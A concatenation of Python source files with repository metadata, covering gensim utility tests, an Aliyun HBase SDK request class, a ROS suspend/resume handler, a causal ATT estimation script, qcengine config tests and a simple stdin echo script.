        corpus = [[(0, 4)]]
        self.assertEqual((True, corpus), utils.is_corpus(corpus))

    def test_invalid_formats(self):
        # None of these consist of (int, float) 2-tuples, so none is a corpus.
        non_corpora = [
            ["human"],
            "human",
            ["human", "star"],
            [1, 2, 3, 4, 5, 5],
            [[(0, 'string')]],
        ]
        for bad in non_corpora:
            self.assertEqual((False, bad), utils.is_corpus(bad))
class TestUtils(unittest.TestCase):
    """Tests for miscellaneous utils helpers."""

    def test_decode_entities(self):
        # A string that fails to decode with unichr on narrow Python builds.
        raw = u'It’s the Year of the Horse. YES VIN DIESEL 🙌 💯'
        decoded = u'It\x92s the Year of the Horse. YES VIN DIESEL \U0001f64c \U0001f4af'
        self.assertEqual(utils.decode_htmlentities(raw), decoded)
class TestSampleDict(unittest.TestCase):
    """Tests for utils.sample_dict."""

    def test_sample_dict(self):
        d = {1: 2, 2: 3, 3: 4, 4: 5}
        expected_dict = [(1, 2), (2, 3)]
        expected_dict_random = [(k, v) for k, v in iteritems(d)]
        # Deterministic (non-random) sampling returns the first n items.
        sampled_dict = utils.sample_dict(d, 2, False)
        self.assertEqual(sampled_dict, expected_dict)
        sampled_dict_random = utils.sample_dict(d, 2)
        # Fix: the old check `sampled_dict_random in expected_dict_random`
        # compared the whole sampled list against individual (k, v) tuples,
        # so it was always False and asserted nothing. Assert instead that
        # every sampled item genuinely comes from the dictionary.
        self.assertEqual(len(sampled_dict_random), 2)
        for item in sampled_dict_random:
            self.assertIn(item, expected_dict_random)
class TestWindowing(unittest.TestCase):
    """Tests for utils.strided_windows / utils.iter_windows / utils.flatten."""

    # Expected result of strided_windows(range(10), 5): 6 overlapping windows.
    arr10_5 = np.array([
        [0, 1, 2, 3, 4],
        [1, 2, 3, 4, 5],
        [2, 3, 4, 5, 6],
        [3, 4, 5, 6, 7],
        [4, 5, 6, 7, 8],
        [5, 6, 7, 8, 9]
    ])
    def _assert_arrays_equal(self, expected, actual):
        # Helper: shape equality plus elementwise equality.
        self.assertEqual(expected.shape, actual.shape)
        self.assertTrue((actual == expected).all())
    def test_strided_windows1(self):
        out = utils.strided_windows(range(5), 2)
        expected = np.array([
            [0, 1],
            [1, 2],
            [2, 3],
            [3, 4]
        ])
        self._assert_arrays_equal(expected, out)
    def test_strided_windows2(self):
        input_arr = np.arange(10)
        out = utils.strided_windows(input_arr, 5)
        expected = self.arr10_5.copy()
        self._assert_arrays_equal(expected, out)
        # Mutating the output must mutate the input: windows are views.
        out[0, 0] = 10
        self.assertEqual(10, input_arr[0], "should make view rather than copy")
    def test_strided_windows_window_size_exceeds_size(self):
        # Window larger than the sequence yields an empty (0, 0) result.
        input_arr = np.array(['this', 'is', 'test'], dtype='object')
        out = utils.strided_windows(input_arr, 4)
        expected = np.ndarray((0, 0))
        self._assert_arrays_equal(expected, out)
    def test_strided_windows_window_size_equals_size(self):
        # Window equal to the sequence yields exactly one window.
        input_arr = np.array(['this', 'is', 'test'], dtype='object')
        out = utils.strided_windows(input_arr, 3)
        expected = np.array([input_arr.copy()])
        self._assert_arrays_equal(expected, out)
    def test_iter_windows_include_below_window_size(self):
        # ignore_below_size=False keeps documents shorter than the window;
        # the default drops them.
        texts = [['this', 'is', 'a'], ['test', 'document']]
        out = utils.iter_windows(texts, 3, ignore_below_size=False)
        windows = [list(w) for w in out]
        self.assertEqual(texts, windows)
        out = utils.iter_windows(texts, 3)
        windows = [list(w) for w in out]
        self.assertEqual([texts[0]], windows)
    def test_iter_windows_list_texts(self):
        texts = [['this', 'is', 'a'], ['test', 'document']]
        windows = list(utils.iter_windows(texts, 2))
        list_windows = [list(iterable) for iterable in windows]
        expected = [['this', 'is'], ['is', 'a'], ['test', 'document']]
        self.assertListEqual(list_windows, expected)
    def test_iter_windows_uses_views(self):
        # With ndarray input and copy=False (default), windows are views.
        texts = [np.array(['this', 'is', 'a'], dtype='object'), ['test', 'document']]
        windows = list(utils.iter_windows(texts, 2))
        list_windows = [list(iterable) for iterable in windows]
        expected = [['this', 'is'], ['is', 'a'], ['test', 'document']]
        self.assertListEqual(list_windows, expected)
        windows[0][0] = 'modified'
        self.assertEqual('modified', texts[0][0])
    def test_iter_windows_with_copy(self):
        # copy=True must decouple the windows from the input arrays.
        texts = [
            np.array(['this', 'is', 'a'], dtype='object'),
            np.array(['test', 'document'], dtype='object')
        ]
        windows = list(utils.iter_windows(texts, 2, copy=True))
        windows[0][0] = 'modified'
        self.assertEqual('this', texts[0][0])
        windows[2][0] = 'modified'
        self.assertEqual('test', texts[1][0])
    def test_flatten_nested(self):
        nested_list = [[[1, 2, 3], [4, 5]], 6]
        expected = [1, 2, 3, 4, 5, 6]
        self.assertEqual(utils.flatten(nested_list), expected)
    def test_flatten_not_nested(self):
        # Already-flat input passes through unchanged.
        not_nested = [1, 2, 3, 4, 5, 6]
        expected = [1, 2, 3, 4, 5, 6]
        self.assertEqual(utils.flatten(not_nested), expected)
if __name__ == '__main__':
    # Quiet the root logger so only warnings surface during the test run.
    logging.root.setLevel(logging.WARNING)
    unittest.main()
| [
"[email protected]"
] | |
547f56cae470648424b7485f6231f2167b17b872 | 9405aa570ede31a9b11ce07c0da69a2c73ab0570 | /aliyun-python-sdk-hbase/aliyunsdkhbase/request/v20190101/CreateInstanceRequest.py | 6dcc7d5ca183ba80569cfe098efcfdd438b27383 | [
"Apache-2.0"
] | permissive | liumihust/aliyun-openapi-python-sdk | 7fa3f5b7ea5177a9dbffc99e73cf9f00e640b72b | c7b5dd4befae4b9c59181654289f9272531207ef | refs/heads/master | 2020-09-25T12:10:14.245354 | 2019-12-04T14:43:27 | 2019-12-04T14:43:27 | 226,002,339 | 1 | 0 | NOASSERTION | 2019-12-05T02:50:35 | 2019-12-05T02:50:34 | null | UTF-8 | Python | false | false | 6,117 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkhbase.endpoint import endpoint_data
class CreateInstanceRequest(RpcRequest):
	"""RPC request wrapper for the ApsaraDB HBase ``CreateInstance`` API
	(product 'HBase', version 2019-01-01). Auto-generated accessors: each
	get_X/set_X pair proxies the query parameter of the same name."""
	def __init__(self):
		RpcRequest.__init__(self, 'HBase', '2019-01-01', 'CreateInstance','hbase')
		# Attach regional endpoint data when the core SDK supports it.
		if hasattr(self, "endpoint_map"):
			setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
		if hasattr(self, "endpoint_regional"):
			setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
	def get_ClusterName(self):
		return self.get_query_params().get('ClusterName')
	def set_ClusterName(self,ClusterName):
		self.add_query_param('ClusterName',ClusterName)
	def get_DbInstanceConnType(self):
		return self.get_query_params().get('DbInstanceConnType')
	def set_DbInstanceConnType(self,DbInstanceConnType):
		self.add_query_param('DbInstanceConnType',DbInstanceConnType)
	def get_EngineVersion(self):
		return self.get_query_params().get('EngineVersion')
	def set_EngineVersion(self,EngineVersion):
		self.add_query_param('EngineVersion',EngineVersion)
	def get_DepMode(self):
		return self.get_query_params().get('DepMode')
	def set_DepMode(self,DepMode):
		self.add_query_param('DepMode',DepMode)
	def get_BackupId(self):
		return self.get_query_params().get('BackupId')
	def set_BackupId(self,BackupId):
		self.add_query_param('BackupId',BackupId)
	def get_DbInstanceType(self):
		return self.get_query_params().get('DbInstanceType')
	def set_DbInstanceType(self,DbInstanceType):
		self.add_query_param('DbInstanceType',DbInstanceType)
	def get_VSwitchId(self):
		return self.get_query_params().get('VSwitchId')
	def set_VSwitchId(self,VSwitchId):
		self.add_query_param('VSwitchId',VSwitchId)
	def get_SecurityIPList(self):
		return self.get_query_params().get('SecurityIPList')
	def set_SecurityIPList(self,SecurityIPList):
		self.add_query_param('SecurityIPList',SecurityIPList)
	def get_AutoRenew(self):
		return self.get_query_params().get('AutoRenew')
	def set_AutoRenew(self,AutoRenew):
		self.add_query_param('AutoRenew',AutoRenew)
	def get_NetType(self):
		return self.get_query_params().get('NetType')
	def set_NetType(self,NetType):
		self.add_query_param('NetType',NetType)
	def get_ZoneId(self):
		return self.get_query_params().get('ZoneId')
	def set_ZoneId(self,ZoneId):
		self.add_query_param('ZoneId',ZoneId)
	def get_CoreDiskType(self):
		return self.get_query_params().get('CoreDiskType')
	def set_CoreDiskType(self,CoreDiskType):
		self.add_query_param('CoreDiskType',CoreDiskType)
	def get_PricingCycle(self):
		return self.get_query_params().get('PricingCycle')
	def set_PricingCycle(self,PricingCycle):
		self.add_query_param('PricingCycle',PricingCycle)
	def get_CoreInstanceQuantity(self):
		return self.get_query_params().get('CoreInstanceQuantity')
	def set_CoreInstanceQuantity(self,CoreInstanceQuantity):
		self.add_query_param('CoreInstanceQuantity',CoreInstanceQuantity)
	def get_Duration(self):
		return self.get_query_params().get('Duration')
	def set_Duration(self,Duration):
		self.add_query_param('Duration',Duration)
	def get_Engine(self):
		return self.get_query_params().get('Engine')
	def set_Engine(self,Engine):
		self.add_query_param('Engine',Engine)
	def get_RestoreTime(self):
		return self.get_query_params().get('RestoreTime')
	def set_RestoreTime(self,RestoreTime):
		self.add_query_param('RestoreTime',RestoreTime)
	def get_SrcDBInstanceId(self):
		return self.get_query_params().get('SrcDBInstanceId')
	def set_SrcDBInstanceId(self,SrcDBInstanceId):
		self.add_query_param('SrcDBInstanceId',SrcDBInstanceId)
	def get_MasterInstanceType(self):
		return self.get_query_params().get('MasterInstanceType')
	def set_MasterInstanceType(self,MasterInstanceType):
		self.add_query_param('MasterInstanceType',MasterInstanceType)
	def get_ColdStorageSize(self):
		return self.get_query_params().get('ColdStorageSize')
	def set_ColdStorageSize(self,ColdStorageSize):
		self.add_query_param('ColdStorageSize',ColdStorageSize)
	def get_CoreDiskQuantity(self):
		return self.get_query_params().get('CoreDiskQuantity')
	def set_CoreDiskQuantity(self,CoreDiskQuantity):
		self.add_query_param('CoreDiskQuantity',CoreDiskQuantity)
	def get_IsColdStorage(self):
		return self.get_query_params().get('IsColdStorage')
	def set_IsColdStorage(self,IsColdStorage):
		self.add_query_param('IsColdStorage',IsColdStorage)
	def get_CoreInstanceType(self):
		return self.get_query_params().get('CoreInstanceType')
	def set_CoreInstanceType(self,CoreInstanceType):
		self.add_query_param('CoreInstanceType',CoreInstanceType)
	def get_CoreDiskSize(self):
		return self.get_query_params().get('CoreDiskSize')
	def set_CoreDiskSize(self,CoreDiskSize):
		self.add_query_param('CoreDiskSize',CoreDiskSize)
	def get_VpcId(self):
		return self.get_query_params().get('VpcId')
	def set_VpcId(self,VpcId):
		self.add_query_param('VpcId',VpcId)
	def get_DbType(self):
		return self.get_query_params().get('DbType')
	def set_DbType(self,DbType):
		self.add_query_param('DbType',DbType)
	def get_PayType(self):
		return self.get_query_params().get('PayType')
	def set_PayType(self,PayType):
		self.add_query_param('PayType',PayType)
"[email protected]"
] | |
afd5e9a732ae36b23155af1e2cba98c435520645 | dde6faa0857c8c7e46cbe3c48dbe80b1ac9c9bcf | /suspend_resume/scripts/suspend_resume_handler_3.py | 18f59181cb17badae55a3e34d125fbf2cc356724 | [] | no_license | ROSDevoloper/Atlas80EVO-Gazebo | 7119270f4421b1a077e3c4abbb90dcf11281023b | 468d068584e71c3cca2169b365ec43faaac33f47 | refs/heads/master | 2022-10-16T10:02:48.121404 | 2020-06-15T05:08:46 | 2020-06-15T05:08:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,185 | py | #!/usr/bin/env python
"""
Author: (1) Arefeen Ridwan
(2) Samuel Chieng Kien Ho
Function: Suspend Resume based on service request
"""
import rospy
from atlas80evo_msgs.msg import FSMState
from atlas80evo_msgs.srv import SetFSMState
from std_srvs.srv import Empty
from geometry_msgs.msg import Twist
from std_msgs.msg import String
class SuspendResumeHandler():
    """Toggles the vehicle FSM between SUSPEND and the last active state.

    Exposes the /suspend/request service: the first call suspends (and
    commands a zero-velocity Twist), the next call restores the state that
    was active before suspension. Runs its own loop from the constructor.
    NOTE: Python 2 / ROS1 code (uses a Python 2 print statement below).
    """
    def __init__(self):
        # Internal USE Variables - Modify with consultation
        self.rate = rospy.Rate(30)
        self.sleep = rospy.Rate(2)
        # pre_state remembers the last non-SUSPEND/ERROR/MANUAL state so it
        # can be restored on resume.
        self.pre_state="NONE"
        self.current_state="NONE"
        # Publisher
        self.drive_pub = rospy.Publisher(rospy.get_param("~drive_topic", "/twist_cmd_mux/input/suspend"), Twist, queue_size=1)
        # Subscriber
        self.state_sub= rospy.Subscriber("/fsm_node/state", FSMState, self.stateCB, queue_size=1) #get current state from ros
        # Service Server
        self.suspend_srv = rospy.Service("/suspend/request", Empty, self.suspendSRV)
        # Service Client
        self.set_state_call = rospy.ServiceProxy("/fsm_node/set_state", SetFSMState)
        # Main Loop (blocks until shutdown)
        self.main_loop()
    # FSM State Callback
    def stateCB(self, msg):
        self.current_state = msg.state
        if str(msg.state)!="SUSPEND" and str(msg.state)!="ERROR" and str(msg.state)!="MANUAL":
            self.pre_state=str(msg.state)
    def suspendSRV(self, req):
        # Toggle: suspend if active, otherwise restore the remembered state.
        self.sleep.sleep()
        if self.current_state!="SUSPEND":
            self.set_state_call("SUSPEND")
            self.stopping()
            #print("suspend")
        else:
            self.set_state_call(self.pre_state)
            print self.pre_state
        self.sleep.sleep()
        return ()
    # Main Loop
    def main_loop(self):
        # Keep publishing zero velocity for as long as the FSM is suspended.
        while not rospy.is_shutdown():
            if(self.current_state=="SUSPEND"):
                self.stopping()
                #print("suspend")
            self.rate.sleep()
    # Stopping Vehicle
    def stopping(self):
        # A default-constructed Twist is all zeros -> full stop command.
        stop_cmd=Twist()
        self.drive_pub.publish(stop_cmd)
if __name__=="__main__":
    # Start the ROS node; the handler's constructor enters its own main loop.
    rospy.init_node("suspend_resume_handler")
    SuspendResumeHandler()
    rospy.spin()
| [
"[email protected]"
] | |
f64feda20504dccac97a40d5747a0a3c49125432 | d05298a88638fd62f74e8f26c5a1959f821367d1 | /src/words_baseline/reddit_output_att.py | 413266f01e93721f50de7639a7e50fc75bac1c43 | [
"MIT"
] | permissive | rpryzant/causal-text-embeddings | d4b93f5852f1854d52a09e28b81ee784015e296a | 2966493f86a6f808f0dfa71d590e3403a840befc | refs/heads/master | 2022-12-22T09:33:23.654291 | 2020-03-05T19:41:33 | 2020-03-05T19:41:33 | 298,045,006 | 1 | 0 | MIT | 2020-09-23T17:28:18 | 2020-09-23T17:28:18 | null | UTF-8 | Python | false | false | 4,087 | py | from semi_parametric_estimation.att import att_estimates, psi_plugin, psi_q_only
from reddit.data_cleaning.reddit_posts import load_reddit_processed
from .helpers import filter_document_embeddings, make_index_mapping, assign_split
import numpy as np
import pandas as pd
import os
from sklearn.linear_model import LogisticRegression, LinearRegression, Ridge
from sklearn.metrics import mean_squared_error as mse
import argparse
import sys
from scipy.special import logit
from scipy.sparse import load_npz
def get_log_outcomes(outcomes):
    """Map raw outcomes to log space: log(max(0, y) + 1) per element.

    The clamp at zero ("relu") guards against negative outcomes so the log
    is always defined; the +1 offset keeps a zero outcome at log(1) == 0.

    Args:
        outcomes: array-like of raw outcome values.

    Returns:
        numpy array of log-transformed outcomes.
    """
    # Vectorized equivalent of the original per-element Python loop.
    outcomes = np.asarray(outcomes, dtype=float)
    return np.log(np.maximum(outcomes, 0.0) + 1.0)
def predict_expected_outcomes(model, features):
    """Return the fitted model's predicted outcomes for *features*."""
    predictions = model.predict(features)
    return predictions
def fit_conditional_expected_outcomes(outcomes, features):
    """Fit a ridge regression of outcomes on features and return the model.

    NOTE(review): relies on the module-level ``verbose`` flag, which is only
    bound when the script runs as __main__.
    """
    regressor = Ridge()
    regressor.fit(features, outcomes)
    fitted = regressor.predict(features)
    if verbose:
        print("Training MSE:", mse(outcomes, fitted))
    return regressor
def predict_treatment_probability(labels, features):
    """Fit a logistic regression P(treatment | features) and return the
    predicted probability of treatment (class 1) for every unit.

    NOTE(review): relies on the module-level ``verbose`` flag, which is only
    bound when the script runs as __main__.
    """
    classifier = LogisticRegression(solver='liblinear')
    classifier.fit(features, labels)
    if verbose:
        print("Training accuracy:", classifier.score(features, labels))
    probabilities = classifier.predict_proba(features)
    return probabilities[:, 1]
def load_simulated_data():
    """Read the simulation TSV (path from the module-level ``simulation_file``)
    and rename its 'index' column to 'post_index'."""
    frame = pd.read_csv(simulation_file, delimiter='\t')
    return frame.rename(columns={'index': 'post_index'})
def load_term_counts(path='../dat/reddit/'):
    """Load the sparse document/term count matrix from *path* and densify it.

    *path* is used as a raw string prefix (not joined), so it should end
    with a path separator.
    """
    sparse_counts = load_npz(path + 'term_counts.npz')
    return sparse_counts.toarray()
def main():
    """Estimate the ATT (average treatment effect on the treated) from the
    simulated reddit data using bag-of-words adjustment.

    Pipeline: load term counts and simulation outcomes, fit a propensity
    model P(T|words) and two outcome regressions E[Y|words, T=t], then plug
    the fitted values into the Q-only and TMLE estimators and print both.
    Relies on the module-level globals ``dat_dir`` and ``simulation_file``
    set in the __main__ block.
    """
    # Term counts: rows are posts, columns are vocabulary terms.
    if not dat_dir:
        term_counts = load_term_counts()
    else:
        term_counts = load_term_counts(path=dat_dir)
    sim_df = load_simulated_data()
    treatment_labels = sim_df.treatment.values
    indices = sim_df.post_index.values
    # Word features for every simulated unit, in simulation order.
    all_words = term_counts[indices, :]
    # Split units by treatment status for the two outcome regressions.
    treated_sim = sim_df[sim_df.treatment==1]
    untreated_sim = sim_df[sim_df.treatment==0]
    treated_indices = treated_sim.post_index.values
    untreated_indices = untreated_sim.post_index.values
    all_outcomes = sim_df.outcome.values
    outcomes_st_treated = treated_sim.outcome.values
    outcomes_st_not_treated = untreated_sim.outcome.values
    words_st_treated = term_counts[treated_indices,:]
    words_st_not_treated = term_counts[untreated_indices,:]
    # Propensity scores and conditional outcome models.
    treatment_probability = predict_treatment_probability(treatment_labels, all_words)
    model_outcome_st_treated = fit_conditional_expected_outcomes(outcomes_st_treated, words_st_treated)
    model_outcome_st_not_treated = fit_conditional_expected_outcomes(outcomes_st_not_treated, words_st_not_treated)
    # Predicted E[Y|words, T=1] and E[Y|words, T=0] for every unit.
    expected_outcome_st_treated = predict_expected_outcomes(model_outcome_st_treated, all_words)
    expected_outcome_st_not_treated = predict_expected_outcomes(model_outcome_st_not_treated, all_words)
    # Plug-in estimators with extreme propensities truncated at 3%.
    q_hat = psi_q_only(expected_outcome_st_not_treated, expected_outcome_st_treated,
        treatment_probability, treatment_labels, all_outcomes, truncate_level=0.03, prob_t=treatment_labels.mean())
    tmle = psi_plugin(expected_outcome_st_not_treated, expected_outcome_st_treated,
        treatment_probability, treatment_labels, all_outcomes, truncate_level=0.03, prob_t=treatment_labels.mean())
    print("Q hat:", q_hat)
    print("TMLE:", tmle)
if __name__ == '__main__':
    # Command-line interface: which simulation to load and how verbose to be.
    parser = argparse.ArgumentParser()
    parser.add_argument("--dat-dir", action="store", default=None)
    parser.add_argument("--sim-dir", action="store", default='../dat/sim/reddit_subreddit_based/')
    parser.add_argument("--subs", action="store", default='13,6,8')
    parser.add_argument("--mode", action="store", default="simple")
    parser.add_argument("--params", action="store", default="1.0,1.0,1.0")
    parser.add_argument("--verbose", action='store_true')
    args = parser.parse_args()
    # These module-level globals are read by main() and the helpers above.
    sim_dir = args.sim_dir
    dat_dir = args.dat_dir
    subs = None
    if args.subs != '':
        subs = [int(s) for s in args.subs.split(',')]
    verbose = args.verbose
    # params are (beta0, beta1, gamma) of the simulation being analyzed.
    params = args.params.split(',')
    sim_setting = 'beta0' + params[0] + '.beta1' + params[1] + '.gamma' + params[2]
    subs_string = ', '.join(args.subs.split(','))
    mode = args.mode
    # Path of the simulated-outcomes TSV produced by the simulation scripts.
    simulation_file = sim_dir + 'subreddits['+ subs_string + ']/mode' + mode + '/' + sim_setting + ".tsv"
main() | [
"[email protected]"
] | |
bf3628287d6912c3ae78c55e67f21dd80313b222 | b95e71dcc1b42ebf3459ee57bd0119c618a79796 | /Array/maximum_subarray.py | 562be03611c865ee216e753a51da805015ca258d | [] | no_license | anton-dovnar/LeetCode | e47eece7de28d76b0c3b997d4dacb4f151a839b5 | 6ed9e1bd4a0b48e343e1dd8adaebac26a3bc2ed7 | refs/heads/master | 2023-06-29T07:21:06.335041 | 2021-07-31T15:08:05 | 2021-07-31T15:08:05 | 361,205,679 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 268 | py | class Solution:
def maxSubArray(self, nums: List[int]) -> int:
max_subarr = float('-inf')
curr_sum = 0
for n in nums:
curr_sum = max(n, curr_sum + n)
max_subarr = max(max_subarr, curr_sum)
return max_subarr
| [
"[email protected]"
] | |
96302dbfad171e64160534464df2b0add5495106 | 59e613d6a0bcb8570c89defa77da398f69b82c77 | /qcengine/tests/test_config.py | 40178a4cfe0e32b0d39d4a31efe3c27904365901 | [
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] | permissive | ffangliu/QCEngine | 3e081e7f5e236c434016e222f716e6b34b24030b | 835b291986069669e4be0e708ec4846ebfd858d6 | refs/heads/master | 2020-04-22T23:57:35.470503 | 2019-02-14T16:57:30 | 2019-02-14T16:57:30 | 170,760,404 | 0 | 0 | null | 2019-02-14T21:27:14 | 2019-02-14T21:27:14 | null | UTF-8 | Python | false | false | 5,049 | py | """
Tests the DQM compute module configuration
"""
import copy
import os
import pydantic
import pytest
import qcengine
from qcengine.testing import environ_context
def test_node_blank():
    """A minimal NodeDescriptor (name + hostname pattern only) must
    construct without raising."""
    # The constructed object itself is irrelevant; only construction matters,
    # so the previously unused local binding was dropped.
    qcengine.config.NodeDescriptor(name="something", hostname_pattern="*")
def test_node_auto():
    """Resources must be divided evenly by jobs_per_node: doubling the jobs
    per node halves each job's cores and memory."""
    desc = {
        "name": "something",
        "hostname_pattern": "*",
        "jobs_per_node": 1,
        "ncores": 4,
        "memory": 10,
        "memory_safety_factor": 0,
    }
    # One job per node gets the whole node.
    node1 = qcengine.config.NodeDescriptor(**desc)
    job1 = qcengine.get_config(hostname=node1)
    assert job1.ncores == 4
    assert pytest.approx(job1.memory) == 10.0
    # Two jobs per node split cores and memory in half.
    desc["jobs_per_node"] = 2
    node2 = qcengine.config.NodeDescriptor(**desc)
    job2 = qcengine.get_config(hostname=node2)
    assert job2.ncores == 2
    assert pytest.approx(job2.memory) == 5.0
def test_node_environ():
    """A $VARIABLE in scratch_directory must be expanded from the
    environment when the variable is set."""
    scratch_name = "myscratch1234"
    with environ_context({"QCA_SCRATCH_DIR": scratch_name}):
        description = {
            "name": "something",
            "hostname_pattern": "*",
            "scratch_directory": "$QCA_SCRATCH_DIR",
        }
        node = qcengine.config.NodeDescriptor(**description)
        assert node.scratch_directory == scratch_name
def test_node_skip_environ():
    """A $VARIABLE that is absent from the environment must resolve to
    None rather than the literal string."""
    description = {
        "name": "something",
        "hostname_pattern": "*",
        "scratch_directory": "$RANDOM_ENVIRON",
    }
    node = qcengine.config.NodeDescriptor(**description)
    assert node.scratch_directory is None
@pytest.fixture
def opt_state_basic():
    """
    Capture the options state and temporarily override.

    Registers three NodeDescriptors (dragonstooth, newriver, and a catch-all
    default) plus a QCA_SCRATCH_DIR environment variable for the duration of
    the test, restoring the original registry afterwards.
    """
    # Snapshot env
    old_node = copy.deepcopy(qcengine.config.NODE_DESCRIPTORS)
    scratch_name = "myscratch1234"
    with environ_context({"QCA_SCRATCH_DIR": scratch_name}):
        configs = [{
            "name": "dragonstooth",
            "hostname_pattern": "dt*",
            "jobs_per_node": 2,
            "ncores": 12,
            "memory": 120,
            "scratch_directory": "$NOVAR_RANDOM_ABC123"
        }, {
            "name": "newriver",
            "hostname_pattern": "nr*",
            "jobs_per_node": 2,
            "ncores": 24,
            "memory": 240
        },
        {
            "name": "default",
            "hostname_pattern": "*",
            "jobs_per_node": 1,
            "memory": 4,
            "memory_safety_factor": 0,
            "ncores": 5,
            "scratch_directory": "$QCA_SCRATCH_DIR"
        }]
        # Install each descriptor into the global registry by name.
        for desc in configs:
            node = qcengine.config.NodeDescriptor(**desc)
            qcengine.config.NODE_DESCRIPTORS[desc["name"]] = node
        yield
    # Reset env
    qcengine.config.NODE_DESCRIPTORS = old_node
def test_node_matching(opt_state_basic):
    """Hostnames must match descriptors by their glob pattern, falling back
    to the catch-all 'default' entry."""
    node = qcengine.config.get_node_descriptor("nomatching")
    assert node.name == "default"
    node = qcengine.config.get_node_descriptor("dt149")
    assert node.name == "dragonstooth"
    node = qcengine.config.get_node_descriptor("nr149")
    assert node.name == "newriver"
def test_node_env(opt_state_basic):
    """scratch_directory env expansion: an unset variable yields None while
    a set one (QCA_SCRATCH_DIR from the fixture) is expanded."""
    node = qcengine.config.get_node_descriptor("dt")
    assert node.name == "dragonstooth"
    assert node.scratch_directory is None
    node = qcengine.config.get_node_descriptor("nomatching")
    assert node.name == "default"
    assert node.scratch_directory == "myscratch1234"
def test_config_default(opt_state_basic):
    """Job configs must reflect the matched node's per-job resource split."""
    # Catch-all default node: 1 job gets all 5 cores and 4 GiB.
    config = qcengine.config.get_config(hostname="something")
    assert config.ncores == 5
    assert config.memory == 4
    # dragonstooth: 12 cores / 2 jobs = 6 cores, memory reduced by safety factor.
    config = qcengine.config.get_config(hostname="dt149")
    assert config.ncores == 6
    assert pytest.approx(config.memory, 0.1) == 54
def test_config_local_ncores(opt_state_basic):
    """An explicit ncores in local_options overrides the node's core count
    without affecting memory."""
    config = qcengine.config.get_config(hostname="something", local_options={"ncores": 10})
    assert config.ncores == 10
    assert config.memory == 4
def test_config_local_njobs(opt_state_basic):
    """Overriding jobs_per_node must divide the default node's 5 cores and
    4 GiB among 5 jobs (1 core, 0.8 GiB each)."""
    config = qcengine.config.get_config(hostname="something", local_options={"jobs_per_node": 5})
    assert config.ncores == 1
    assert pytest.approx(config.memory) == 0.8
def test_config_local_njob_ncore(opt_state_basic):
    # NOTE(review): this test is shadowed by the identically named function
    # defined immediately below it, so pytest never collects or runs this
    # one. Rename one of the two to restore coverage.
    config = qcengine.config.get_config(hostname="something", local_options={"jobs_per_node": 3, "ncores": 1})
    assert config.ncores == 1
    assert pytest.approx(config.memory, 0.1) == 1.33
def test_config_local_njob_ncore_memory(opt_state_basic):
    """An explicit memory value in local_options must override the derived
    per-job memory share.

    Renamed from ``test_config_local_njob_ncore``: the original name
    collided with the test defined just above, silently shadowing it so
    pytest only ever ran this one.
    """
    config = qcengine.config.get_config(
        hostname="something", local_options={
            "jobs_per_node": 3,
            "ncores": 1,
            "memory": 6
        })
    assert config.ncores == 1
    assert pytest.approx(config.memory, 0.1) == 6
def test_config_validation(opt_state_basic):
    """Unknown keys in local_options must raise a pydantic ValidationError."""
    with pytest.raises(pydantic.ValidationError):
        # The return value is irrelevant (the call must raise), so the
        # previously unused `config =` binding was dropped.
        qcengine.config.get_config(hostname="something", local_options={"bad": 10})
def test_global_repr():
    """global_repr() must render the environment summary as a string."""
    assert isinstance(qcengine.config.global_repr(), str)
| [
"[email protected]"
] | |
25bb1e59fa52a1478f01a27db44ee8ae299b07d2 | 81407be1385564308db7193634a2bb050b4f822e | /the-python-standard-library-by-example/subprocess/repeater.py | cf01ca41051f6970c677e34642d0326924274e24 | [
"MIT"
] | permissive | gottaegbert/penter | 6db4f7d82c143af1209b4259ba32145aba7d6bd3 | 8cbb6be3c4bf67c7c69fa70e597bfbc3be4f0a2d | refs/heads/master | 2022-12-30T14:51:45.132819 | 2020-10-09T05:33:23 | 2020-10-09T05:33:23 | 305,266,398 | 0 | 0 | MIT | 2020-10-19T04:56:02 | 2020-10-19T04:53:05 | null | UTF-8 | Python | false | false | 1,421 | py | #!/usr/bin/env python
#
# Copyright 2007 Doug Hellmann.
#
#
# All Rights Reserved
#
# Permission to use, copy, modify, and distribute this software and
# its documentation for any purpose and without fee is hereby
# granted, provided that the above copyright notice appear in all
# copies and that both that copyright notice and this permission
# notice appear in supporting documentation, and that the name of Doug
# Hellmann not be used in advertising or publicity pertaining to
# distribution of the software without specific, written prior
# permission.
#
# DOUG HELLMANN DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,
# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN
# NO EVENT SHALL DOUG HELLMANN BE LIABLE FOR ANY SPECIAL, INDIRECT OR
# CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS
# OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN
# CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
"""Echo anything written to stdin on stdout.
"""
__module_id__ = "$Id$"
#end_pymotw_header
import sys

# Announce startup on stderr so stdout stays clean for the echoed data.
sys.stderr.write('repeater.py: starting\n')
sys.stderr.flush()

# Echo stdin to stdout line by line until EOF.
while True:
    next_line = sys.stdin.readline()
    # readline() returns '' only at EOF; a blank input line is '\n'.
    if not next_line:
        break
    sys.stdout.write(next_line)
    # Flush after each line so a parent process sees the echo immediately.
    sys.stdout.flush()

sys.stderr.write('repeater.py: exiting\n')
sys.stderr.flush()
| [
"[email protected]"
] | |
